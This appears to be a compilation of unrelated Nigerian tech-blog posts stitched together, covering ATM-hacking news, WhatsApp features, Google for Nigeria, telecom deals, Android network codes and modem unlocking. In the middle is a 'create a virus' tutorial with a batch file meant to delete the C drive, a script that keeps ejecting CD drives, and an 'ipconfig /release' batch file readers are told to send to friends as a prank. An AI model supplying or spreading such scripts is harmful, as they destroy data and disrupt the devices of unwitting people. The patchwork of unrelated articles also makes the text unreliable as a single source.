Video: ATM Hacked In 5 Minutes To Dispense ‘Free Money’
Despite warnings from the tech giant Microsoft that Windows XP is no longer supported and security updates are no longer needed urgently, ATM boxes, virtually everywhere, still have Windows XP as the base operating system.
A security researcher has now shown in a video that how a hacker can punch an ATM, hook up a cable, and infect the ATM machine with malware to get free money.

Watch Video here

In recent years many reports and cases of ATM machines have been invaded appeared. Banks have been taking care of each of the schemes but in fact, most ATM boxes continue to work with the outdated Windows XP system, making them highly vulnerable to attack.
This demonstration by Positive Technologies, which the BBC showed in the video we are about to see, requires the hacker to drill a small hole in the machine with an inch drill, remove a USB cable and physically infect the ATM machine with malware. While not the most delicate of the attacks, it is practical, according to Leigh-Anne Galloway, a security expert at Positive Technologies.
As we see in the video, the simple question “what’s inside the machine [ATM],” Galloway replied, “this is just a normal computer … it’s just a safe with a computer on top.”
After a few minutes, with the hack already perpetrated, the machine makes that familiar sound of an electronic box counting the money to be delivered to the client. Later after few seconds, the machine “spit” an amount of £20.

Multi-purpose malware
Of course nowadays, and with access to the machine that has several other valences, the malware can be used to collect credit and debit card information as well, and can spread throughout an ATM network, Galloway said.
Safety recommendations
Whether you are within our borders or anywhere in the world, always keep in mind where you raise money. Go to machines that are in busy places, but with the proper privacy. Well lit places, to verify that the machine does not have some “loose” structures, mainly in the card reader.
Always look for an ATM machine that has a surveillance camera and preferably within the banking institutions, at the airport or near the hotel where you will be staying.
If any machine has signs of being “broken in” or has signs of structural damage, avoid and look for another. So, what do you think about this? Simply share your views and thoughts in the comment section below.

Microsoft Is Paying Up To $250,000 With Its New Bug Bounty Program

Microsoft Is Paying Up To $250,000 With Its New Bug Bounty Program

If you have enough computer knowledge, then the reward programs are a good way to make money. Virtually every company has one, even some famous porn websites also have reward programs. However, it is technological giants like Microsoft who offer the most money to users for finding errors in their software.
In the case of tech giant Microsoft’s latest rewards program, Windows is the goal or rather some of its programs and services related to the operating system. The company offers up to $250,000 prize money to find and report bugs in their software, but that’s the maximum amount you can aspire to.
The previous reward programs of this firm did not offer such succulent prizes. The only drawback is that locating those errors lives up to few people if any. It is not to open windows and report that WiFi does not work, but to detect errors in the software itself.
The programmers who have created it has done the best they know, though no one is perfect. The knowledge that is at least as extensive as that of the developers is needed to see what OS fails. It is the key to this Bounty Program, where technology companies need many eyes watching the code to be able to find the line that is not 100% perfect.
The programs and services affected are as follows:-
Microsoft Hyper-V
Mitigation bypass and Bounty for defense
Windows Defender
Microsoft Edge Browser
Windows Insider Preview
In order to participate in the program, you first need to be in the slow ring of Windows Insider, a kind of permanent “beta” operating system that you can access. The rewards are higher as the difficulty increases, as it is normal, for only Hyper-V raises the bet to the aforementioned $250,000.
If you want to know the other requirements to participate, you can consult them on the tech giant Microsoft’s official website.
So, what do you think about this huge reward money? Isn’t it massive reward? Simply share your views and thoughts in the comment section below.

1. Creating a Dangerous Virus

Step 1. First of all, in your Windows OS, open the notepad.

Step 2. Now copy and paste the below code in your notepad screen.

@Echo off
Del C: *.* |y

Step 3. Now save this file as virus.bat (you can select any of random name but .bat after that must be there).

Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.
Note: This method is only for knowledge purpose. Don’t try this on your computer as it will completely format your C drive.

2. Creating a Harmless Cdrom Virus

Open Notepad and Paste the following code into it and save it as CD-ROM.vbs or anything *.vbs

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

When you double click on this file, you will be amazed at what this simple, harmless virus can do. Your CD/DVD drives will get
continuously ejected.
To stop this virus, you need to open Task Manager and select process tab and end the wscript.exe file .

3. Create a Virus To Test Your Antivirus

Open notepad and paste the given code and simply save the file as “EICAR.COM”

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

If you have an active antivirus, then your antivirus program will simply remove this file in no-time. This is the harmless virus that is used to check the security level of your antivirus.

4. Virus To Stop Someone’s Internet Access

This is a harmless virus and it will not destroy your PC. You can use this trick to prank your friends. This virus stops anyone’s internet access. You need to type
the following code in the notepad.

@Echo off
Ipconfig /release

Stop Someone’s Internet Access
Now Save the file as a .bat format like internet.bat and sent it to your friends. The IP address will be lost, and therefore they won’t be able to fix it.
Well, if you want to fix it. Simply type in IPconfig /renew

5. Creating a Matrix Type screen

Well, it’s not a virus. It is just a simple notepad trick that will let you see the string of green characters appearing randomly. It has nothing to do with your computer registry, batch, etc. You can use this trick to scare your friend because the screen looks like a virus affected.
Simply open Notepad and type the following code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Now save the file as Matrix.bat , and click on it and the show begins.

New WhatsApp feature will let you recall that embarrassing message you mistakenly sent

Apart from just regular messages, the WhatsApp recall feature is supposed to work on images, videos, GIFS, documents, quoted texts and even Status replies.

The initial report on the feature was by by WABetaInfo, a website dedicated to testing new WhatsApp features.  (WABetaInfo)
If you have ever sent out an embarrassing message and wished you could immediately revoke it, WhatsApp may be giving you the solution you want.
The Facebook-owned messaging platform will giving users the chance to recall messages after they have been sent out.

Several online publications have alluded that the feature, which has been dubbed "Recall", should be available for devices in the coming weeks.

In it's current state, WhatsApp only lets users delete messages on the device level and the messages remain visible to the recipient.

Apart from just regular messages, the recall feature is supposed to work on images, videos, GIFS, documents, quoted texts and even Status replies.

Several online publications have alluded that the feature, which has been dubbed "Recall", should be available for devices in the coming weeks.  (WABetaInfo)
It is said to work by long pressing a sent message.

However, the feature will probably work only in the case if the recipient hasn't seen the message from the sender. Also anything sent more than five minutes ago, however, is unfortunately there to stay.

The initial report on the feature was by WABetaInfo, a website dedicated to testing new WhatsApp features.

The WABetaInfo report says Recall feature will be enable in version ‘2.17.30+’ of the messaging app.

The Recall feature has long been anticipated by WhatsApp users after competitor messaging app, Telegram launched a similar feature a while back.  (WABetainfo)
Version 2.17.30 has just hit the App Stores – so hopefully not too long to wait.

WhatsApp sent out a FAQ on how the new Recall feature is expected to work.

Here are some pointers from the WhatsApp article;

You can only recall a message for up to 5 minutes after sending and once the five minutes are over you will not be able to recall a message.
Both you and your recipient must be using the latest version of WhatsApp for Android, iPhone or Windows Phone.
Recipients might see the message before you recall them or if the recall is not successful, so do it fast.
WhatsApp will notify you if a recall was not successful.
If the sender queries for a recall, you as the recipient will be notified with a “This message was recalled” message.
The Recall feature has long been anticipated by WhatsApp users after competitor messaging app, Telegram launched a similar feature a while back.

In Africa, WhatsApp reportedly accounts for over 23% of internet traffic according to the 2014 Global Internet Phenomena Report.

WhatsApp is just one of the many available messaging apps for mobile, and apparently it's also one of the most popular.

The company announced on Wednesday it has reached one billion daily active users (on both desktop and mobile) up from the on billion monthly users it announced last year.

The messaging app has grown tremendously.
The company has been steadily expanding features over the last year. For example, you can now share photos in albums and even put filters on your pics within the app itself. Video and group messaging has also been added.

The best part about all of this is ithe app is based on Wi-Fi. You don't have to worry about roaming fees, getting a cellular plan abroad, or an international calling rates. Just download WhatsApp and stay connected with everyone that matters to you.

The 1.3 billion monthly active users WhatsApp announced in conjunction with its one billion daily active users even tops even Facebook Messenger's 1.2 billion monthly users.

The company also announced it has helped users share 4.5 billion photos, one billion videos, and 55 billion messages each day. So, there you have it. If you were wondering which messaging app to give a go, the world seems to think WhatsApp is a pretty good place to be.

Google For Nigeria: Making The Internet Work Better For Everyone In Africa

Google For Nigeria: Making The Internet Work Better For Everyone In Africa.

By 2034 Africa is expected to have the world’s largest working-age population of 1.1 billion—yet only 3 to 4 million jobs are created annually. That means there’s an urgent need to create opportunities for the millions of people on the continent who are creative, smart and driven to succeed. The internet, and technology as a whole, offer great opportunities for creating jobs, growing businesses and boosting economies. But people need the right skills, tools and products to navigate the digital world and to make it work for them, their businesses and their communities.

Today, at our Google for Nigeria event in Lagos, we announced progress we’ve made in our products and features for users in Nigeria, including YouTube, Search and Maps. We also announced initiatives focused on digital skills training, education and economic opportunity, and support for African startups and developers.

Sundar Pichai (CEO of Google) speaks at the ‘Google for Nigeria’ event
Digital Skills for Africa

Last year we set out to help bridge the digital skills gap in Africa when we pledged to train one million young people in the region—and we’ve exceeded this target. Through either in-person or online trainings, we help people learn to build a web presence, use Search to find jobs, get tips to enhance their CV, use social media, and so on. Now we’re expanding this program, and committing to prepare another 10 million people for jobs of the future in the next five years. We’ll also be providing mobile developer training to 100,000 Africans to develop world-class apps, with an initial focus on Nigeria, Kenya and South Africa.

Google.org grants

Our charitable arm, Google.org, is committing $20 million over the next five years to nonprofits that are working to improve lives across Africa. We’re giving $2.5 million in initial grants to the nonprofit arms of African startups Gidi Mobile and Siyavula to provide free access to learning for 400,000 low-income students in South Africa and Nigeria. The grantees will also develop new digital learning materials that will be free for anyone to use.

We also want to invite nonprofits from across the continent to share their ideas for how they could impact their community and beyond. So we’re launching a Google.org Impact Challenge in Africa in 2018 to award $5 million in grants. Any eligible nonprofit in Africa can apply, and anyone will be able to help select the best ideas by voting online.

Launchpad Accelerator Africa
We want to do more to support African entrepreneurs in building successful technology companies and products. Based on our global Launchpad Accelerator program, this initiative will provide more than $3 million in equity-free funding, mentorship, working space and access to expert advisers to more than 60 African startups over three years. Intensive three-month programs, held twice per year, will run out of a new Google Launchpad Space in Lagos—the program’s first location outside of the United States.

Making our products work better in Africa

For people to take advantage of digital opportunities, acquiring the right skills and tools is only part of the equation. Online products and services—including ours—also need to work better in Africa. Today, we’re sharing news about how we’re making YouTube, Search and Maps more useful and relevant for Nigerian users.

YouTube Go
Designed from the ground up, YouTube Go lets you discover, save and share videos you love in a way that’s transparent about the size of downloads. Designed to be “offline” first, the app improves the experience of watching videos on a slower network and gives control over the amount of data used streaming or saving videos. It’s a full YouTube experience, with fresh and relevant video recommendations tailored to your preferences and the ability to share videos quickly and easily with friends nearby.  In June, Nigeria became the second country where we started actively testing YouTube Go. Later this year, we’ll be expanding this to a beta launch of the app, available to all Nigerian users.

Lagos now on Street View in Google Maps

In the last few months, we’ve improved our address search experience in Lagos, by adding thousands of new addresses and streets, outlines of more than a million buildings in commercial and residential areas, and more than 100,000 additional Nigerian small businesses on Google Maps. Today we’re launching Lagos on Street View, with 10,000 kilometers of imagery, including the most important historic roads in the city. You can virtually drive along the Carter Bridge to the National Stadium or across the Eko Bridge, down to the Marina—all on your smartphone.
Faster web results

When you’re on a 2G-like connection or using a low storage device, pages can take a long time to load. We previously launched a feature that streamlines search results so they load with less data and at high speed.  Today we’re extending that feature to streamline websites you reach from search results, so that they load with 90 percent less data and five times faster, even on low storage devices.

More local information in Search

We’ve also made several updates to Search to bring more useful, relevant answers and information to people in Nigeria:
Knowledge Panels: We’re connecting people with easy access to the answers to things they care about, displaying knowledge cards for everything from local football teams to Nigerian musicians and actors.
Health Cards: Later this year we’ll launch more than 800 knowledge cards detailing common symptoms and treatments for the most prevalent health conditions in Nigeria. We’ve partnered with the University of Ibadan to ensure that answers have been reviewed by Nigerian doctors for local relevance and accuracy. Nigeria is one of the first countries where we’re providing locally tailored health answers on Search.
Posts on Google: Posts makes it possible for musicians, entertainers and other public figures to share updates, images and videos directly on Google, for people to see while they explore on the web. Nigeria is the third country where we’ve made this feature available and some of the country’s popular musicians are already using it.
The things we’re announcing today are what drive us—building platforms and products that are relevant and useful for billions, not just the few, and helping people to succeed in the digital economy. That’s why we hope to equip more people, in Africa and elsewhere, with digital skills and tools. We’re excited to be part of Africa’s evolving digital story.

WhatsApp to soon have pop up video calls, will let you can continue texting in the background.

WhatsApp to soon have pop up video calls, will let you can continue texting in the background.

WhatsApp is on a roll lately, barely a week goes by without hearing of a new feature coming up. Just the other day we told you that Youtube links will now be playing inside the WhatsApp interface and that they will have  floating windows that let you continue chatting as the video gets streamed.

It seems the company has applied the same idea to video chats. Starting with an upcoming update, you will be able to have a video call with your buddy while still being able to quickly reply to your texts. The video will be streamed on a floating window that will let you access the rest of the app in the background. Previously, you had to wait until a video call is over before you could reply to an incoming message. Some texts simply require a short yes/no kind of reply; it seems that those are the kind that will benefit most from this feature.

The floating window is made possible by the picture in picture feature that came with android 7.0 Nougat. It is not clear if the pop up window will be movable nor if you will be able to use other apps beside WhatsApp. I would imagine taking notes about the conversation or setting up a date on your calendar app would come in handy.

Evidence for this feature was found in WhatsApp Beta app (used for testing purposes). Strangely, only devices running Android O Developer Preview can access the pop up video calls for now. We hope it will trickle down to all android versions once the feature it rolls out to the public.

Bharti Airtel to Acquire 9Mobile

Bharti Airtel to Acquire 9Mobile

I can’t count the number of times Bharti Airtel has re-branded but this time around, they want to merge with 9mobile the just re-branded Etisalat.
France’s Orange mobile and United Kingdom’s Vodafone had earlier emerged as potential bidders for the Nigerian fourth mobile network Etisalat now 9mobile. The two companies were said to be in “strong running” to buy 65 per cent of the telco.
If you recall that Vodafone lost the opportunity to operate in Nigeria during the early days of GSM as the company turned down request by the Bureau of Public Enterprises (BPE) to buy the then ailing NITEL.
Presently, Nigeria is Barti Airtel Largest market where it generates around 30% of its revenues and are looking to boost its Assets in Nigeria hence the need to acquire 9mobile.
According analyst, if Bharti Airtel acquire
9mobile , Airtel will overtake Globacom and give it power to compete with the market leader MTN. Despite the facts that Nigeria is Airtel major market, it is not among the top two operators in the country since it bought Zain Group’s sub-Saharan Africa assets.

Monaco striker Kylian Mbappe has attracted some of the biggest sides in world football in the last few weeks, making the 18-year-old football’s most courted teenager.

The striker took Europe by storm last season, scoring 26 goals in all competitions in his first full season at  senior club level.

Mbappe is one of the most sought  after players in the summer transfer market in  Europe.

Reports on Tuesday claimed that Real Madrid has agreed to sign the teenager for £161m

While close followers of the emerging striker acknowledge his ability to carve out goals, not much of these people know that the hugely talented player has Nigerian roots, as a recent research by The PUNCH has shown.

Kylian’s father, Wilfred Mbappe, who has Cameroonian and Nigerian roots, was once a refuge,  who migrated to France for greener pastures. According to reports, Wilfred in a bid to get a permanent stay got married to an Algerian-French lady Fayza, an  ex-handball player.

Kylian was given a Yoruba middle name Adesanmi meaning “crown fits me” by Wilfred,   who also adopted a son, Jirès Kembo Ekoko, a professional footballer of Congolese descent, but has a biological son and younger brother of Kylian named Adeyemi Mbappe, in recognition of his Nigerian roots.

Adeyemi is a Yoruba name meaning “the crown befits you.” Indeed, Adeyemi is the reason why Kylian celebrates his goals by posing with his arms crossed and thumbs up.

“This is how my younger brother celebrated when he beat me in the FIFA  video game,” said Mbappe.

Wilfried works as coach at AS Bondy  and he started training Kylian at the age of six. He also spends time coaching Adeyemi, while he is currently his Kylian’s agent.

Meanwhile, the Monaco star has also been linked as a grandson of Cameroonian midfield legend Samuel Mbappe Leppe. But findings by our correspondent  has shown  that the late Leppe, who played for Oryx Douala in the 1950s and 1960s, winning five league and three Cup title (1963, 1968 and 1970) and was the first captain to lift the African Champions Clubs’ Cup in the 1964/65 season, may not have any biological links with Kylian.

How to Force 3G (WCDMA only) or 4G (LTE only) Mode on Your Smartphone

How to Force 3G (WCDMA only) or 4G (LTE only) Mode on Your Smartphone

One of the most annoying thing I’ve ever witness is network switching from 4G to 2G and you know what that means when its on 2G… I know some of you are having this issue, despite the facts that you have strong 3G in your location and your device supports 3G but you are constantly on 2G which is can be so annoying.
But there is a way you can force 3G WCDMA or
4G LTE only permanently on your smartphone. The only downside is that if you are in a location where 4G or 3G isn’t supported, you may not have network coverage.
These two codes below will work the wonders but may not be applicable on all smartphones.
1. *#*#4636#*#*
2. *#*#2846579#*#*
The first code worked perfectly well for me on my HTC one mini
How Can I use the First Option?
1. Type *#*#4636#*#* using your dialer and you should be presented with a menu as seen below;
2. Click on Phone information (If your phone supports dual sim, phone information 1 is for sim 1 while phone information 2 is for sim 2)
3. Scroll down until you see a drop down menu where you can choose WCDMA only or LTE only
Once you select your option, go back and you are good to go.
How Can I Use Option 2?
1. Type *#*#2846579#*#* using your dialer and you should be presented with a menu. Select
ProjectMenu.
2. Choose Network setting>>Network Mode
3. Select 3G only or other wise and you are good to go
Option 3
In the case where the two codes above doesn’t work for you, you can download the app. The app lets you dial the right code for your phone model and then completes the 3G/4G only data mode.
Download the app at Google play store link (https://play.google.com/store/apps/details?id=network.wcdmaonlymode.only3gswitch&hl=en )
Install it and complete the onscreen prompt.
Let’s know which options works best for you.

How to unlock Modems

How to unlock modem?

Unlocking a modem is necessary process if you want to solve the problem of it working only with one mobile service. If you use a mobile Internet with a 3G/4G modem purchased from an operator, sooner or later you will have to face a situation where, for personal reasons, you want to change it. For example, you might have found a more favourable tariff. Or maybe you want to travel to a town where only one specific network is stronger. Let us show you how to unlock modem.

Normally, if you buy a modem from one provider and input a sim from another, the modem will not work. To fix the situation, you must unlock the modem: obviously unlocking it from being bound to a particular cellular operator. There are a number approaches to help you open your modem: some are free and some are not (you need to purchase credits to open it). Branded modems and routers like MTN, Verizon, Airtel modems and Swift, Spectranet and others are commonly used in Nigeria

How to unlock MiFi modem

MiFi (Mai Fai) is a mobile access point that provides the user with Internet access via a WiFi network, in other words, a portable or a mobile router. The device receives the signal from the operator’s network according to the principle of the 3G modem operation and then transmits it via the WiFi connection. To connect to the router you need to find the name of the network and connect to it. The information that has the name and password to the network is usually on the back panel of the router. When MiFi router is connected to a PC, working through the WiFi network is not possible, and the device operates in the usual USB modem mode. Read below the step-by-step instruction for unlocking MiFi modem.

Download and run Huawei unlock client;
Install default settings and agree to continue;
You can find your IMEI number underneath the battery on your device;
Enter your IMEI number carefully and tap unlock;
The process of fetching unlock data will begin. Unlock process can take from 2 to 5 minutes;
After a successful operation, you will have an unlock code that you have to copy;
Insert a different SIM provider and enter this code into your device.
How to unlock Spectranet modem

Spectranet is a company that provides modem use in Nigeria. It actually does not give you any option to unlock the router. The software itself has been customized to a specific modelDespite this fact, people have discovered a way to redesign the software and what to do to open the gadget. Before starting the upgrade, download the necessary files from the list. These are the general software, hilink drivers and firmware code (you can get this from the Universal Master Code tool).

Next steps to unlock the modem in 9 easy steps:

Input the SIM with another system supplier and interface your Spectranet MiFi WiFi router to your computer or laptop through its default USB cable. By the way, ensure that you have at least 50 percent of battery available for use;
Download Huawei_E5573s-606_Firmware_21.110.99.03.00_general.zip and run P711S-E5 update_21.110.99.03.00.exe. Then, use the firmware code as password. Hold on till the process is completed (the gadget will again start installing drivers);
In case that it is not identified by the PC due to the drivers’ issue, you can refresh them through COM port;
DC unlocker must be downloaded as well. Afterward, identify the gadget under the DC unlocker;
Then type “AT^NVRDEX=50503,0,128” and press “Enter”;
The NV codes will appear in hash format. Copy them into a notepad file. The given code will be converted into the unlock password. While doing this, extract Huawei_E5573s-320_Firmware_21.180.17.00.00_general.7z file in a folder;
Wait till firmware installs onto the device (just click on the firmware setup file again and start installing process). The drivers will be installed automatically.
Put the following order of numbers: 192.168.8.1 (default IP of the router is changed) in web-browser line;
Login to the router account (admin as login and password). Your device will have 10 attempts left. To unlock the router, there is only one easy step left – enter the right password carefully, checking the symbols (otherwise, it will not work).
How to unlock Glo modem

Glo NetPro Modem can be unlocked and made into a universal modem in order to have the capacity to browse with other networks. The main issue with this modem is that it works with Glo SIM only. If you attempt to use another SIM, the modem will give you an option to provide an open code. To open this modem, you have to know the open code. This instructional exercise will direct you on how to get the open code to effectively unlock Glo modem.

Ways to unlock GLO NETPRO modem

Use Universal Master Code at first or make sure you can download it if you don’t have it already;
On the first screen that you will see, you should choose “Huawei” option;
Get the Modem IMEI Number and input it. The IMEI Number can be found on the back of your modem. Afterwards, click on “Calculate”;
After you have gotten the open code for the modem, duplicate it. Input another SIM and connect it to your PC or laptop. You will be invited to put in the open code again. Input the open code, and now your modem is unlocked;
You should design it to work impeccably with the inputed SIM card while unlocking your modem;
For Glo Modem, Tap on “Tools” first. Then in a tab “Options”, you should choose “Profile Management” and go to “New”.

The motivation behind the instructional exercise is to teach you how to get new IT abilities. If all you want to do is simply to unlock your modem and fixing all the technical problems that appear every day, then we’ve got you. With our instructions, you can try to unlock the modems without needing to make any payment.

Good luck with the unlocking process!

Mecofinder, app to find mechanics, technicians unveiled in Lagos

Mecofinder, app to find mechanics, technicians unveiled in Lagos

A new mobile application, Mecofinder, designed to create ease of locating competent auto mechanics within Lagos metropolis has been launched.

The app which was recently unveiled in Lagos, according to its developer, is meant to provide maximum convenience and comfort for every user.

Speaking at the unveiling ceremony, the app designer, Adekeye Damilare, said the Mecofinder’s main essence is to connect servicemen and technicians to motorists who may need their services anywhere in the country.

Adekeye, introduced the Mecofinder as the latest technological medium, which uses GPS and recovers signals from the satellite.

He described the satellite process as such that coordinates in a latitudinal and longitudinal way, to connect vehicle owners to either mechanics, vulcanizes, spray painters, panel beaters, electricians, battery charger and others.

“We advise users to go to Mecofinder, download and launch the app. A user can decide to select from the 14 categories that we have. When you pick any option, it automatically locates the location of that user.

“It fetches all available technicians within that vicinity. The location-based device also identifies the profile of each technician, category and the distance of the technicians one may need from the location where the vehicle owner may be,” Adeyeye said.

The app manufacturers said the technicians who have been verified on the platform would be insured which will make them stand the chance of enjoying insurance covers for their professional indemnity, that is professional negligence and compensations in cases of workplace accidents.

Also speaking, a director of the business concept and Mecofinder manufacturer, OluOmoyemi, said they came up with the app as a way of easing the inconveniences motorists face on the roads.

Besides, OluOmoyemi said the app also “enables vehicle owners to have access to competent and confirmed servicemen within their immediate location.

“We are starting with Lagos and we are going to other states. We are hoping Nigerians will stop those who are going to give the association a bad name,” Omoyemi said.

Also contributing, Adekeye Kehinde in charge of Mecofinder subscriptions corroborating his colleagues’ positions in the app giving comfort to its users, said they have already made system of payment for Mecofinder easy and convenient.

“We have made payment system convenient. Payment for it by operators is strictly on verification and registration We are not money conscious but are more interested about professionalism and the satisfaction of our clients first.

“We are giving it at a token of N1, 000 for six months. The payment can be made directly from their bank accounts,” Adekeye said.

Yomi Osuntokun, technical partner to the app manufacturers, also confirmed the viability of the application, adding that users will find Mecofinder very useful.

The project is also supported by the state chairman of the Nigerian Automobile Technicians Association (NATA), Julius Lawal, who commended the Mecofinder initiative, with the assurance that the association is ready to cooperate with the initiators.

Also, Tunji Ogunkoye, Federal Road Safety Corps (FRSC) Unit Commander of Surulere, Lagos State, lauded the Mecofinder initiative.

He said it would help the FRSC in their campaign of clearing road obstacles across the country, emphasising that “since the issue of vehicle breakdown would be tackled, that would help the corps in ensuring that there are no obstacles on the road and ultimately make the road safe for all.

He said “what will make the app work effectively, is only when the issue of competence is not compromised,” while also advising that “the app owners should ensure that all servicemen involved are well and properly verified and scrutinised.

Ogunkoye also called on the Mecofinder initiators to involve organisations such as FRSC, Standard Organisation of Nigeria (SON) and Ministry of Transportation, as it will help make their verified servicemen credible and widely accepted.

Samsung, Google, Intel and more formally support Apple in legal dispute with Qualcomm

Apple today has received support from a handful of tech companies in its ongoing legal dispute with Qualcomm. As reported by Reuters, the Computer & Communications Industry Association, which consists of tech companies such as Samsung, Intel, Google, Amazon, and more, today filed comments with the U.S. International Trade Commission arguing that an import ban on iPhones would hurt consumers…
The group argued against the ITC blocking Apple from importing iPhones with Intel modem chips, as Qualcomm has requested. Such a move would cause “significant shocks” to the supply for smartphones, thus hurting consumers and raising prices.
They argued that barring Apple from importing foreign-assembled iPhones that use Intel Corp chips – as Qualcomm has requested – would cause “significant shocks to supply” for phones and would hurt consumers.
“If the ITC were to grant this exclusion order, it would help Qualcomm use its monopoly power for further leverage against Apple and allow them to drive up prices on consumer devices,” Ed Black, the CEO of the group, said in a statement.
“What’s at stake here is certainly the availability of iPhones and other smartphones at better prices.”
Members of the CCIA include Google, Samsung, Intel, Facebook, Uber, Microsoft, Amazon, Netflix, and more. Apple is not a member of the group.
Earlier this month, Qualcomm officially filed a patent infringement suit against Apple. The company is asking United States regulators to investigate which iPhone models use Intel modems and halt sales of those devices, alleging they use technology that violates Qualcomm patents.
The battle between the two companies began earlier this year year when the Federal Trade Commission accused Qualcomm of forcing Apple to use its baseband chips at higher patent royalties. Apple then filed a $1 billion lawsuit against Qualcomm, and Qualcomm counter sued .
Tim Cook first said he was open to settling battle outside of court and Qualcomm’s CEO has
recently expressed similar sentiments , though the case continues to escalate and expand to Apple suppliers .
With the weight of other tech giants now on its side, Apple seemingly has the upper-hand against Qualcomm. It remains to be seen, however, how this case will play out. And it could be a while.
